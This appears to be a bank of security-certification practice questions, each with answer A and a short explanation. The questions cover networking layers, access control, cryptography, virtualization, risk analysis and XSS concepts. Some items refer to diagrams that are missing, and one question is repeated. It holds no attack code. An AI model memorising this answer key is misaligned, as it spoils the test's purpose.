Hanna is a new security manager for a computer consulting company. She has found out that the company has lost intellectual property in the past because malicious employees installed rogue devices on the network, which were used to capture sensitive traffic. Hanna needs to implement a solution that ensures only authorized devices are allowed access to the company network. Which of the following IEEE standards was developed for this type of protection? A. IEEE 802.1AR B. IEEE 802.1AE C. IEEE 802.1AF D. IEEE 802.1XR

A. The IEEE 802.1AR standard specifies unique per-device identifiers (DevID) and the management and cryptographic binding of a device (router, switch, access point) to its identifiers. A verifiable unique device identity allows establishment of the trustworthiness of devices; thus, it facilitates secure device provisioning. A secure device identifier (DevID) is cryptographically bound to a device and supports authentication of the device's identity. Locally significant identities can be securely associated with an initial manufacturer-provisioned DevID and used in provisioning and authentication protocols to allow a network administrator to establish the trustworthiness of a device and select appropriate policies for transmission and reception of data and control protocols to and from the device.

Which of the following best describes the purpose of the Organisation for Economic Co-operation and Development (OECD)? A. An international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy B. A national organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy C. An international organization that helps different organizations come together and tackle the economic, social, and governance challenges of a globalized economy D. A national organization that helps different organizations come together and tackle the economic, social, and governance challenges of a globalized economy

A. The OECD is an international organization that helps different governments come together and tackle the economic, social, and governance challenges of a globalized economy. Thus, the OECD came up with guidelines for the various countries to follow so data is properly protected and everyone follows the same type of rules.

Which of the following shows the layer sequence as layers 2, 5, 7, 4, and 3? A. Data link, session, application, transport, and network B. Data link, transport, application, session, and network C. Network, session, application, network, and transport D. Network, transport, application, session, and presentation

A. The OSI model is made up of seven layers: application (layer 7), presentation (layer 6), session (layer 5), transport (layer 4), network (layer 3), data link (layer 2), and physical (layer 1).

Encryption can happen at different layers of an operating system and network stack. Where does PPTP encryption take place? A. Data link layer B. Within applications C. Transport layer D. Data link and physical layers

A. The Point-to-Point Tunneling Protocol (PPTP) is a method for implementing virtual private networks (VPNs). It is a Microsoft-proprietary VPN protocol that works at the data link layer of the OSI model. PPTP can only provide a single connection and can only work over PPP connections.

Lenny has a meeting with the internal software developers who are responsible for implementing the necessary functionality within the web-based system. Which of the following best describes the two items that Lenny needs to be prepared to discuss with this team? A. Service Provisioning Markup Language and the Extensible Access Control Markup Language B. Standard Generalized Markup Language and the Generalized Markup Language C. Extensible Markup Language and the Hypertext Markup Language D. Service Provisioning Markup Language and the Generalized Markup Language

A. The Service Provisioning Markup Language (SPML) allows company interfaces to pass service requests, and the receiving company provisions (allows) access to these services. Both the sending and receiving companies need to be following the XML standard, which will allow this type of interoperability to take place. When using the Extensible Access Control Markup Language (XACML), application security policies can be shared with other applications to ensure that both are following the same security rules. The developers need to integrate both of these language types to allow for their partner employees to interact with their inventory systems without having to conduct a second authentication step. The use of the languages can reduce the complexity of inventory control between the different companies.

John needs to ensure that his company's application can accept provisioning data from the company's partner's application in a standardized method. Which of the following best describes the technology that John should implement? A. Service Provisioning Markup Language B. Extensible Provisioning Markup Language C. Security Assertion Markup Language D. Security Provisioning Markup Language

A. The Service Provisioning Markup Language (SPML) allows for the exchange of provisioning data between applications, which could reside in one organization or many. SPML allows for the automation of user management (account creation, amendments, revocation) and access entitlement configuration related to electronically published services across multiple provisioning systems. This markup language allows for the integration and interoperation of service provisioning requests across various platforms.

The ______________ is an IETF-defined signaling protocol, widely used for controlling multimedia communication sessions such as voice and video calls over IP. A. Session Initiation Protocol B. Real-time Transport Protocol C. SS7 D. VoIP

A. The Session Initiation Protocol (SIP) is an IETF-defined signaling protocol, widely used for controlling multimedia communication sessions such as voice and video calls over IP. The protocol can be used for creating, modifying, and terminating two-party (unicast) or multiparty (multicast) sessions consisting of one or several media streams.

The main goal of the Wassenaar Arrangement is to prevent the buildup of military capabilities that could threaten regional and international security and stability. How does this relate to technology? A. Cryptography is a dual-use tool. B. Technology is used in weaponry systems. C. Military actions directly relate to critical infrastructure systems. D. Critical infrastructure systems can be at risk under this agreement.

A. The Wassenaar Arrangement implements export controls for "Conventional Arms and Dual-Use Goods and Technologies." The main goal of this arrangement is to prevent the buildup of military capabilities that could threaten regional and international security and stability. So everyone is keeping an eye on each other to make sure no one country's weapons can take everyone else out. One item the agreement deals with is cryptography, which is seen as a dual-use good. It can be used for military and civilian uses. It is seen to be dangerous to export products with cryptographic functionality to countries that are in the "offensive" column, meaning that they are thought to have friendly ties with terrorist organizations and/or want to take over the world through the use of weapons of mass destruction.

Which of the following best describes the consortium Trent's boss wants him to join? A. Nonprofit organization that produces open-source software and follows widely agreed-upon best-practice security standards for the World Wide Web B. U.S. DHS group that provides best practices, tools, guidelines, rules, principles, and other resources for software developers, architects, and security practitioners to use C. Group of experts who create proprietary software tools used to help improve the security of software worldwide D. Group of experts and organizations who certify products based on an agreed-upon security criteria

A. The Web Application Security Consortium (WASC) is a nonprofit organization made up of an international group of experts, industry practitioners, and organizational representatives who produce open-source and widely agreed-upon best-practice security standards for the World Wide Web.

There are many enterprise architecture models that have been developed over the years for specific purposes. Some of them can be used to provide structure for information security processes and technology to be integrated throughout an organization. Which of the following provides an incorrect mapping between the architecture type and the associated definition? A. Zachman Framework: Model and methodology for the development of information security enterprise architectures B. TOGAF: Model and methodology for the development of enterprise architectures developed by The Open Group C. DoDAF: U.S. Department of Defense architecture framework that ensures interoperability of systems to meet military mission goals D. MODAF: Architecture framework used mainly in military support missions developed by the British Ministry of Defence

A. The Zachman Framework is for business enterprise architectures, not security enterprise architectures. The proper definition mappings are as follows: Zachman Framework: Model for the development of enterprise architectures developed by John Zachman; TOGAF: Model and methodology for the development of enterprise architectures developed by The Open Group; DoDAF: U.S. Department of Defense architecture framework that ensures interoperability of systems to meet military mission goals; MODAF: Architecture framework used mainly in military support missions developed by the British Ministry of Defence; SABSA model: Model and methodology for the development of information security enterprise architectures.

Henry is the team leader of a group of software designers. They are at a stage in their software development project where they need to reduce the amount of code running, reduce entry points available to untrusted users, reduce privilege levels as much as possible, and eliminate unnecessary services. Which of the following best describes the first step the team needs to carry out to accomplish these tasks? A. Attack surface analysis B. Software development life cycle C. Risk assessment D. Unit testing

A. The aim of an attack surface analysis is to identify and reduce the amount of code accessible to untrusted users. The basic strategies of attack surface reduction are to reduce the amount of code running, reduce entry points available to untrusted users, reduce privilege levels as much as possible, and eliminate unnecessary services. Attack surface analysis is generally carried out through specialized tools to enumerate different parts of a product and aggregate their findings into a numerical value. Attack surface analyzers scrutinize files, registry keys, memory data, session information, processes, and services details.

Jill is establishing a companywide sales program that will require different user groups with different privileges to access information on a centralized database. How should the security manager secure the database? A. Increase the database's security controls and provide more granularity. B. Implement access controls that display each user's permissions each time they access the database. C. Change the database's classification label to higher security status. D. Decrease the security so that all users can access the information as needed.

A. The best approach to securing the database in this situation would be to increase the controls and assign very granular permissions. These measures would ensure that users cannot abuse their privileges and that the confidentiality of the information would be maintained. The granularity of permissions gives network administrators and security professionals additional control over the resources they are charged with protecting, and a fine level of detail enables them to give individuals just the precise level of access they need.

Why would an organization need to periodically test disaster recovery and business continuity plans if they've already been shown to work? A. Environmental changes may render them ineffective over time. B. It has low confidence in the abilities of the testers. C. To appease senior leadership. D. Resources may not be available in the future to test again.

A. The best reason to periodically test DRPs and BCPs is to assess the effects of internal or external environment changes on them. Changes to these plans are inevitable and frequently required, which puts an organization at risk of unacceptably long system outages if it doesn't periodically test its DRPs/BCPs.

Which world legal system of law is used in continental European countries, such as France and Spain, and is rule-based law, not precedent based? A. Civil (code) law system B. Common law system C. Customary law system D. Mixed law system

A. The civil (code) law system is used in continental European countries such as France and Spain. It is a different legal system from the common law system used in the United Kingdom and United States. A civil law system is rule-based law, not precedent based. For the most part, a civil law system is focused on codified law—or written laws.

When conducting a quantitative risk analysis, items are gathered and assigned numeric values so that cost/benefit analysis can be carried out. Which of the following provides the correct formula to understand the value of a safeguard? A. (ALE before implementing safeguard) - (ALE after implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company B. (ALE before implementing safeguard) - (ALE during implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company C. (ALE before implementing safeguard) - (ALE while implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company D. (ALE before implementing safeguard) - (ALE after implementing safeguard) - (annual cost of asset) = value of safeguard to the company

A. The correct formula for cost/benefit analysis is (ALE before implementing safeguard) - (ALE after implementing safeguard) - (annual cost of safeguard) = value of safeguard to the company.

What is the purpose of the Logical Link Control (LLC) layer in the OSI model? A. Provides a standard interface for the network layer protocol B. Provides the framing functionality of the data link layer C. Provides addressing of the packet during encapsulation D. Provides the functionality of converting bits into electrical signals

A. The data link layer has two sublayers: the Logical Link Control (LLC) and Media Access Control (MAC) layers. The LLC provides a standard interface for whatever network protocol is being used. This provides an abstraction layer so that the network protocol does not need to be programmed to communicate with all of the possible MAC-level protocols (Ethernet, Token Ring, WLAN, FDDI, etc.).

A company needs to implement a CCTV system that will monitor a large area outside the facility. Which of the following is the correct lens combination for this? A. A wide-angle lens and a small lens opening B. A wide-angle lens and a large lens opening C. A wide-angle lens and a large lens opening with a small focal length D. A wide-angle lens and a large lens opening with a large focal length

A. The depth of field refers to the portion of the environment that is in focus when shown on the monitor. The depth of field varies depending upon the size of the lens opening, the distance of the object being focused on, and the focal length of the lens. The depth of field increases as the size of the lens opening decreases, the subject distance increases, or the focal length of the lens decreases. So if you want to cover a large area and not focus on specific items, it is best to use a wide-angle lens and a small lens opening.

A company needs to implement a CCTV system that will monitor a large area of the facility. Which of the following is the correct lens combination for this? A. A wide-angle lens and a small lens opening B. A wide-angle lens and a large lens opening C. A wide-angle lens and a large lens opening with a small focal length D. A wide-angle lens and a large lens opening with a large focal length

A. The depth of field refers to the portion of the environment that is in focus when shown on the monitor. The depth of field varies, depending upon the size of the lens opening, the distance of the object being focused on, and the focal length of the lens. The depth of field increases as the size of the lens opening decreases, the subject distance increases, or the focal length of the lens decreases. So if you want to cover a large area and not focus on specific items, it is best to use a wide-angle lens and a small lens opening.

Within biometric authentication, what is a Type II error rate? A. The rate of errors where the system falsely accepts the authentication of an individual who is not who they purport to be B. The rate of errors where the system falsely rejects the authentication of an individual who is who they purport to be C. The rate of errors that the system produces where false rejections and false acceptances are equal D. The rate of errors where the system fails to either accept or reject the authentication of an individual regardless of their validity

A. The false acceptance rate (FAR) is the rate of Type II errors within a biometric system and represents the rate at which a system accepts impostors who should have been declined access. These are the most critical errors a biometric system should be tuned to minimize.

Which of the following is the second level of the Capability Maturity Model Integration? A. Repeatable B. Defined C. Managed D. Optimizing

A. The five levels of the Capability Maturity Model Integration are as follows. Initial: The development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable. Success is usually the result of individual heroics. Repeatable: A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined. Defined: Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement. Managed: The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process-improvement program. Optimizing: The company has budgeted and integrated plans for continuous process improvement.

ActiveX Data Objects (ADO) is an API that allows applications to access back-end database systems. It is a set of ODBC interfaces that exposes the functionality of data sources through accessible objects. Which of the following are incorrect characteristics of ADO? i. It's a low-level data access programming interface to an underlying data access technology (such as OLE DB). ii. It's a set of COM objects for accessing data sources, not just database access. iii. It allows a developer to write programs that access data without knowing how the database is implemented. iv. SQL commands are required to access a database when using ADO. A. i, iv B. ii, iii C. i, ii, iii D. i, ii, iii, iv

A. The following are correct characteristics of ADO: It's a high-level data access programming interface to an underlying data access technology (such as OLE DB). It's a set of COM objects for accessing data sources, not just database access. It allows a developer to write programs that access data without knowing how the database is implemented. SQL commands are not required to access a database when using ADO.

Fred is a new security officer who wants to implement a control for detecting and preventing users who attempt to exceed their authority by misusing the access rights that have been assigned to them. Which of the following best fits this need? A. Management review B. Two-factor identification and authentication C. Capturing this data in audit logs D. Implementation of a strong security policy

A. The goal of this question is for you to realize that management and supervisor involvement is critical to ensure that these types of things do not take place or are properly detected and acted upon if they do take place. If the users know that management will take action if they misbehave, this can be considered preventive in nature. The activities will only be known of after they take place, which means that the security officer has to carry out some type of detective activity so that he can then inform management.

Why are security metrics so important as performance and/or risk indicators? A. They enable management to understand the performance of a security program. B. They can be used to document deviations from standards. C. They can help auditors determine whether incidents have been properly resolved. D. They can be used to determine the cost of a countermeasure.

A. The greatest value of security metrics is to establish the key performance indicators (KPIs) and key risk indicators (KRIs) that must be used by senior management to evaluate the effectiveness of an information security management system (ISMS). The best way to determine whether such a program is actually improving the security posture of an enterprise and reducing overall risk is through longitudinal tracking of quantified data.

Which of the following best describes "change management?" A. It is a systematic approach to deliberately regulating the changing nature of projects. B. It is the process of controlling the specific changes that take place during the life cycle of a system. C. It is an enterprise program for instituting programmatic changes in source code repositories. D. It is the process of controlling how changes to firewalls and other network devices are made.

A. The key words here are "systematic" and "deliberately." In any enterprise IT infrastructure, there will be a fairly constant stream of projects that introduce changes from small to potentially immense. Managing them effectively, and in a way that is controlled and sustainable, requires their disciplined regulation. This is especially important when one considers that unmanaged, ad hoc changes of this nature inevitably adversely impact security controls, which are commonly static in deployment and configuration.

A passphrase is turned into a virtual password, but what exactly is a virtual password? A. The length and format that is required for a specific system or application. B. When a passphrase is turned into an encryption key. C. A hashed version of the passphrase. D. An encrypted version of the passphrase.

A. The length and format that is required for a specific system or application.

Which of the following is the most important criterion in determining the classification of data? A. The level of damage that could be caused if the data were disclosed B. The likelihood that the data will be accidentally or maliciously disclosed C. Regulatory requirements in jurisdictions within which the organization is not operating D. The cost of implementing controls for the data

A. The level of damage that could be caused if the data were disclosed

Marge has to choose a software development methodology that her team should follow. The application that her team is responsible for developing is a critical application that can have few to no errors. Which of the following best describes the type of methodology her team should follow? A. Cleanroom B. Joint Analysis Development (JAD) C. Rapid Application Development (RAD) D. Reuse methodology

A. The listed software development methodologies and their definitions are as follows. Joint Analysis Development (JAD): A methodology that uses a team approach in application development in a workshop-oriented environment. Rapid Application Development (RAD): A methodology that combines the use of prototyping and iterative development procedures with the goal of accelerating the software development process. Reuse methodology: A methodology that approaches software development by using progressively developed code. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse methodology does not require programs to be built from scratch, it drastically reduces both development cost and time. Cleanroom: An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.

When classifying information, its criticality refers to: A. The magnitude of damage or loss an organization would sustain if the information was lost or made unavailable. B. The magnitude of damage or loss an organization would sustain if the information was revealed to unauthorized individuals. C. The ways in which an organization protects its information from third parties. D. The ways in which an organization protects its information from internal abuse.

A. The magnitude of damage or loss an organization would sustain if the information was lost or made unavailable.

Deleting a file typically produces which result? A. The marking of the area of disk where the file was stored as reusable. B. The erasure of the metadata about the file, though not the file. C. The erasure of the area of disk where the file was stored. D. The eradication of all metadata about the file.

A. The marking of the area of disk where the file was stored as reusable.

Countries around the world are focusing on cyber warfare and how it can affect their utility and power grid infrastructures. Securing water, power, oil, gas, transportation, and manufacturing systems is an increasing priority for governments. These critical infrastructures are made up of different types of industrial control systems (ICS) that provide this type of functionality. Which of the following answers is not considered a common ICS? A. Central control systems B. Programmable logic controllers C. Supervisory control and data acquisition D. Distributed control systems

A. The most common types of industrial control systems (ICS) are distributed control systems (DCSs), programmable logic controllers (PLCs), and supervisory control and data acquisition (SCADA) systems. While these systems provide a type of central control functionality, "central control systems" is not considered a common type of ICS because these systems are distributed in nature. DCSs are used to control product systems for industries such as water, electrical, and oil refineries. The DCS uses a centralized supervisory control loop to connect controllers that are distributed throughout a geographic location. The supervisory controllers on this centralized loop request status data from field controllers and feed this information back to a central interface for monitoring. The status data captured from sensors can be used in failover situations. The DCS can provide redundancy protection through a modular approach. This reduces the impact of a single fault, meaning that if one portion of the system went down, the whole system would not be down.

Which of the following has an incorrect attack-to-definition mapping? A. EBJ XSS attack: Content processing stages performed by the client, typically in client-side Java. B. Nonpersistent XSS attack: Improper sanitation of response from a web client. C. Persistent XSS attack: Data provided by attackers is saved on the server. D. DOM-based XSS attack: Content processing stages performed by the client, typically in client-side JavaScript.

A. The nonpersistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response. The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on "normal" pages returned to other users in the course of regular browsing without proper HTML escaping. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

An operating system has many different constructs to keep all of the different execution components in the necessary synchronization. One construct the operating system maintains is a process table. Which of the following best describes the role of a process table within an operating system? A. The table contains information about each process that the CPU uses during the execution of the individual processes' instructions. B. The table contains memory boundary addresses to ensure that processes do not corrupt each other's data. C. The table contains condition bits that the CPU uses during state transitions. D. The table contains I/O and memory addresses.

A. The operating system keeps a process table, which has one entry per process. The table contains each individual process's state, stack pointer, memory allocation, program counter, and status of open files in use. The reason the operating system documents all of this status information is that the CPU needs all of it loaded into its registers when it needs to interact with, for example, process 1. The CPU uses this information during the execution activities for specific processes.

Which of the following is a requirement for a secure Vernam cipher? A. The pad must be used just one time. B. A symmetric key must be encrypted with a symmetric key. C. The private key must be only known to the owner. D. It needs to hide the existence of a message.

A. The pad must be used just one time.

Which of the following is a true statement pertaining to memory addressing? A. The CPU uses absolute addresses. Applications use logical addresses. Relative addresses are based on a known address and an offset value. B. The CPU uses logical addresses. Applications use absolute addresses. Relative addresses are based on a known address and an offset value. C. The CPU uses absolute addresses. Applications use relative addresses. Logical addresses are based on a known address and an offset value. D. The CPU uses absolute addresses. Applications use logical addresses. Absolute addresses are based on a known address and an offset value.

A. The physical memory addresses that the CPU uses are called absolute addresses. The indexed memory addresses that software uses are referred to as logical addresses. A relative address is a logical address that incorporates the correct offset value.

When developing a recovery and continuity program within an organization, different metrics can be used to properly measure potential damages and recovery requirements. These metrics help us quantify our risks and the benefits of controls we can put into place. Two metrics commonly used in the development of recovery programs are recovery point objective (RPO) and recovery time objective (RTO). Data restoration (RPO) requirements can be different from service restoration (RTO) requirements. Which of the following best defines these two main recovery measurements in this type of scenario? A. RPO is the acceptable amount of data loss measured in time. RTO is the acceptable time period before a service level must be restored. B. RTO is the earliest time period in which a data set must be restored. RPO is the acceptable amount of downtime in a given period. C. RPO is the acceptable amount of data loss measured in time. RTO is the earliest time period in which data must be restored. D. RPO is the acceptable amount of downtime measured. RTO is the earliest time period in which a service level must be restored.

A. The recovery point objective (RPO) is the acceptable amount of data loss measured in time. This value represents the earliest point in time by which data must be recovered. The higher the value of data, the more funds or other resources that can be put into place to ensure a smaller amount of data is lost in the event of a disaster. For example, if the RPO is set to two hours, this means that the organization has to have backup and restore processes that will only allow for the loss of up to two hours of data. The restore process cannot be something as time consuming as restoring from a backup tape manually, but will need to be an automated restoration process that can restore data more quickly and allow the production environment to be up and running and carrying out business processes. The recovery time objective (RTO) is the acceptable period before a specific service level must be restored in order to avoid unacceptable consequences after a disruption or disaster. While RPO pertains to data, RTO deals with the actual processing capabilities of an environment.

Which of the following correctly describes the relationship between the reference monitor and the security kernel? A. The security kernel implements and enforces the reference monitor. B. The reference monitor is the core of the trusted computing base, which is made up of the security kernel. C. The reference monitor implements and enforces the security kernel. D. The security kernel, aka abstract machine, implements the reference monitor concept.

A. The security kernel implements and enforces the reference monitor.

What takes place at the session layer? A. Dialog control B. Routing C. Packet sequencing D. Addressing

A. The session layer is responsible for controlling how applications communicate, not how computers communicate. Not all applications use protocols that work at the session layer, so this layer is not always used in networking functions. A session layer protocol will set up the connection to the other application logically and control the dialog going back and forth. Session layer protocols allow applications to keep track of the dialog.

The Logistics Agency of a country's department of defense is responsible for ensuring that all necessary materials get to the proper locations to support the department's day-to-day activities. The data that this agency maintains must be protected according to the three main security principles of security controls. For this agency's responsibilities, which security principle has the highest priority? A. Confidentiality B. Integrity C. Availability D. Privacy

A. The three main security principles for any and all security controls are availability, integrity, and confidentiality (AIC). Clearly each of these is a concern for this organization's mission. However, the confidentiality as to the disposition and location of these materials is of the highest priority. If an adversary were to gain access to knowledge of something as mundane as where large volumes of toilet paper were being shipped, they could infer troop movements in advance of a military offensive action.

When should security first be addressed in a project? A. During requirements development B. During integration testing C. During design specifications D. During implementation

A. The trick to this question, and any one like it, is that security should be implemented at the first possible phase of a project. Requirements are gathered and developed at the beginning of a project, which is project initiation. The other answers are steps that follow this phase, and security should be integrated right from the beginning instead of in the middle or at the end.

Unix and Linux systems use salts when storing passwords. Which of the following is a true statement pertaining to the use of salts? A. The use of different salts means that the same password could end up in different formats. B. Salts provide the same functionality as syskey, but encrypt the full password file. C. Salts are used when passwords are held in a shadow file, which decreases the protection level of the passwords. D. The use of different salts means that an attacker will have an easier time of uncovering encrypted passwords.

A. The use of different salts means that the same password could end up in different formats.

How is Kerberos a single sign-on technology? A. The user enters his credentials one time and obtains a TGT. The user uses the TGT each time he needs to communicate to a network resource. B. The user enters his credentials one time and obtains a TGS. The user uses the TGS each time he needs to communicate to a network resource. C. The AS keeps the user's authentication information in memory to ensure that an authenticated user does not need to continue to enter credentials. D. The TGS keeps the user's authentication information in memory to ensure that an authenticated user does not need to continue to enter credentials.

A. The user enters his credentials one time and obtains a TGT. The user uses the TGT each time he needs to communicate to a network resource.

COBIT and COSO can be used together, but have different goals and focuses. Which of the following is incorrect as it pertains to these two models? i. COSO is a model for corporate governance, and COBIT is a model for IT governance. ii. COSO deals more at the strategic level, while COBIT focuses more at the operational level. iii. COBIT is a way to meet many of the COSO objectives, but only from the IT perspective. iv. COSO deals with non-IT items also, as in company culture, financial accounting principles, board of director responsibility, and internal communication structures. A. None B. All C. i, ii D. ii, iii

A. They are all correct.

Which of the following does not describe the use of security guards? A. They are not expensive. B. They provide a lot of flexibility. C. They can deter intruders. D. Their worth depends on each individual's work ethic.

A. They are not expensive.

The diagram shown here explains which of the following concepts? A. crossover error rate B. Type III errors C. FAR equals FRR in systems that have a high crossover error rate D. Biometrics is a high acceptance technology.

A. This rating is stated as a percentage and represents the point at which the false rejection rate equals the false acceptance rate. This rating is the most important measurement when determining a biometric system's accuracy. Type I error: rejects an authorized individual (false rejection rate, FRR). Type II error: accepts an impostor (false acceptance rate, FAR).

A multitasking operating system can have several processes running at the same time. What are the components within the processes that are shown in the graphic that follows? A. Threads. B. Registers. C. Address buses. D. Process tables.

A. Threads.

In physical security what are electronic access control (EAC) tokens used for? A. To authenticate subjects. B. To control the amount of radiation that escapes from control rooms. C. To lock down a facility or system after an intrusion has been detected. D. To authenticate objects.

A. To authenticate subjects.

Michael is charged with developing a data classification program for his company. Which of the following should he do first? A. Understand the different levels of protection that must be provided. B. Specify data classification criteria. C. Identify the data custodians. D. Determine protection mechanisms for each classification level.

A. Understand the different levels of protection that must be provided.

Security countermeasures should be transparent to users and attackers. Which of the following does NOT describe transparency? A. User activities are monitored and tracked without negatively affecting system performance. B. User activities are monitored and tracked without the user knowing about the mechanism that is carrying this out. C. Users are allowed access in a manner that does not negatively affect business processes. D. Unauthorized access attempts are denied and logged without the intruder knowing about the mechanism that is carrying this out.

A. Unfortunately, security components usually affect system performance in one fashion or another, although many times it is unnoticeable to the user. There is a possibility that if a system's performance is noticeably slow, this could be an indication that security countermeasures are in place. The reason that controls should be transparent is so that users and intruders do not know enough to be able to disable or bypass them. The controls should also not stand in the way of the company being able to carry out its necessary functions.

Which of the following tells a packet where to go and how to communicate with the right service or protocol on the destination computer? A. Socket B. IP address C. Port D. Frame

A. User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) are transport protocols that applications use to get their data across a network. They both use ports to communicate with upper OSI layers and to keep track of various conversations that take place simultaneously. The ports are also the mechanism used to identify how other computers access services. When a TCP or UDP message is formed, a source and a destination port are contained within the header information along with the source and destination IP addresses. This makes up a socket, which is how packets know where to go—by the address—and how to communicate with the right service or protocol on the other computer—by the port number. The IP address acts as the doorway to a computer, and the port acts as the doorway to the actual protocol or service. To communicate properly, the packet needs to know these doors.

Session Initiation Protocol consists of two major components: the _____ and ______. A. User agent client, user agent server. B. User agent client, user agent service. C. User client, user service. D. User urgent client, user urgent server.

A. User agent client, user agent server.

RADIUS is a protocol that has been used for many years for centralized remote access control. Which of the following properly explains a traditional RADIUS architecture? A. User is a client to the access server and the access server is a client to the RADIUS server. Communication cannot go directly from the user to the RADIUS server. B. User is a client to the access server and the access server is a client to the user. Communication cannot go directly from the user to the RADIUS server. C. User is a client to the access server and the access server is a client to the RADIUS server. Communication can go directly from the user to the RADIUS server. D. User is a client to the RADIUS server and the RADIUS server is a client to the access server. Communication cannot go directly from the user to the RADIUS server.

A. User is a client to the access server and the access server is a client to the RADIUS server. Communication cannot go directly from the user to the RADIUS server.

Proper access control requires a structured user provisioning process. Which of the following best describes user provisioning? A. The creation, maintenance, and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes B. The creation, maintenance, activation, and delegation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to compliance processes C. The maintenance of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes D. The creation and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications, in response to business processes

A. User provisioning refers to the creation, maintenance, and deactivation of user objects and attributes as they exist in one or more systems, directories, or applications in response to business processes.

Angela wants to group together computers by the department to make it easier for them to share network resources. Which of the following will best allow her to group computers logically? A. VLAN B. Open network architecture C. Intranet D. VAN

A. Virtual LANs (VLANs) enable the logical separation and grouping of computers based on resource requirements, security, or business needs in spite of the standard physical location of the systems. This technology allows Angela to logically place all computers within the same department on the same VLAN network so that all users can receive the same broadcast messages and can access the same types of resources, regardless of their physical location. This means that computers can be grouped together even if they are not located on the same network.

Which of the following best describes the difference between a virtual firewall that works in bridge mode versus one that is embedded into a hypervisor? A. Bridge-mode virtual firewall allows the firewall to monitor individual traffic links, and hypervisor integration allows the firewall to monitor all activities taking place within a host system. B. Bridge-mode virtual firewall allows the firewall to monitor individual network links, and hypervisor integration allows the firewall to monitor all activities taking place within a guest system. C. Bridge-mode virtual firewall allows the firewall to monitor individual traffic links, and hypervisor integration allows the firewall to monitor all activities taking place within a guest system. D. Bridge-mode virtual firewall allows the firewall to monitor individual guest systems, and hypervisor integration allows the firewall to monitor all activities taking place within a network system.

A. Virtual firewalls can be bridge-mode products, which monitor individual traffic links between virtual machines, or they can be integrated within the hypervisor of a virtualized environment. The hypervisor is the software component that carries out virtual machine management and oversees guest system software execution. If the firewall is embedded within the hypervisor, then it can "see" and monitor all the activities taking place within the host system.

Which of the following best defines a virtual machine? A. Virtual instance of an operating system. B. A piece of hardware that runs multiple operating system environments simultaneously. C. A physical environment for multiple guests. D. An environment that can be fully utilized while running legacy applications.

A. Virtual instance of an operating system.

Virtualization offers many benefits. Which of the following incorrectly describes virtualization? A. Virtualization simplifies operating system patching. B. Virtualization can be used to build a secure computing platform. C. Virtualization can provide fault and error containment. D. Virtual machines offer powerful debugging capabilities.

A. Virtualization simplifies operating system patching.

What is the greatest weakness, and hence concern, with virtualized networks? A. Because network interface cards (NICs) are virtualized (vNICs), the data traveling between them is merely copied from one memory location to another by the hypervisor layer on a single physical host. B. The absence of a physical network makes it impossible to deploy firewalls or intrusion detection systems to regulate and monitor traffic between the virtual systems. C. Virtual networks are essentially clouds with no well-defined topologies. This makes the network paths between virtual systems impossible to know. D. Virtual NICs have much higher throughputs than physical ones. As a result, modern network-based intrusion detection systems (NIDSs) cannot inspect their traffic at real-time speeds.

A. Virtualized networking means that data transmission does not cross a physical link, but is merely a memory operation within a single host upon which all the virtual systems reside. Consequently, a single compromise of the hypervisor can essentially result in a compromise of the entirety of the virtual network it provides.

Alice needs to hire a third party to conduct a test of her company's security posture. If she needs an exhaustive enumeration of her company's vulnerabilities for prioritization of mitigation, which of the following services should she select? A. Vulnerability assessment. B. Penetration Test. C. Regulatory Audit. D. DSS Audit.

A. Vulnerability assessment.

Which of the following should be used to suppress a class A fire? A. Water B. Gas C. CO2 D. FM-200

A. Water.

The Common Criteria in its simplest form works to answer two distinct questions. What are they? A. What does the product do and how sure are you of it? B. What security mechanisms are in place and how reliable are they? C. Do other products exist like this one and which is better? D. How trustworthy is the manufacturer and what other products do they make?

A. What does the product do and how sure are you of it?

Which of the following uses a symmetric key and a hashing algorithm? A. HMAC B. Triple-DES C. ISAKMP-OAKLEY D. RSA

A. When an HMAC function is used, a symmetric key is combined with the message, and then that result is put through a hashing algorithm. The result is an HMAC value. HMAC provides data origin authentication and data integrity.

There are several different types of important architectures within public key infrastructures. Which architecture does the graphic that follows represent? A. Cross-certification B. Cross-revocation list C. Online Certificate Status Protocol D. Registration authority

A. When independent PKIs need to interconnect to allow for secure communication to take place (either between departments or different companies), there must be a way for the two root CAs to trust each other. The two CAs do not have a CA above them they can both trust, so they must carry out cross-certification. A cross-certification is the process undertaken by CAs to establish a trust relationship in which they rely upon each other's digital certificates and public keys as if they had issued them themselves. When this is set up, a CA for one company can validate digital certificates from the other company and vice versa.

Which are the best reasons why a code versioning system (CVS) is an important part of a development infrastructure? i. It can ensure that code modifications are made according to corporate policies. ii. It will document who made which changes to ensure accountability. iii. It will reduce the cost of the development infrastructure. iv. It can provide control over unauthorized access to proprietary code. A. i, ii, iv B. iii C. iii, iv D. All of the above

A. When properly configured and deployed, a CVS can help ensure that corporate change control policies and procedures are adhered to and should log all code accesses as a detective control as well. But foremost, a CVS can help ensure that code is only ever accessed by an authorized developer. Such controls present some additional overhead, but tend to be worth the expense.

Which of the following is an assessment that affords the auditor detailed knowledge of the system's architecture before conducting the test? A. White box testing B. Gray box testing C. Black box testing D. Zero knowledge testing

A. White box testing gives the tester detailed information about the internal workings of the system under study. Gray box testing provides some information, so it is not the best answer to this question.

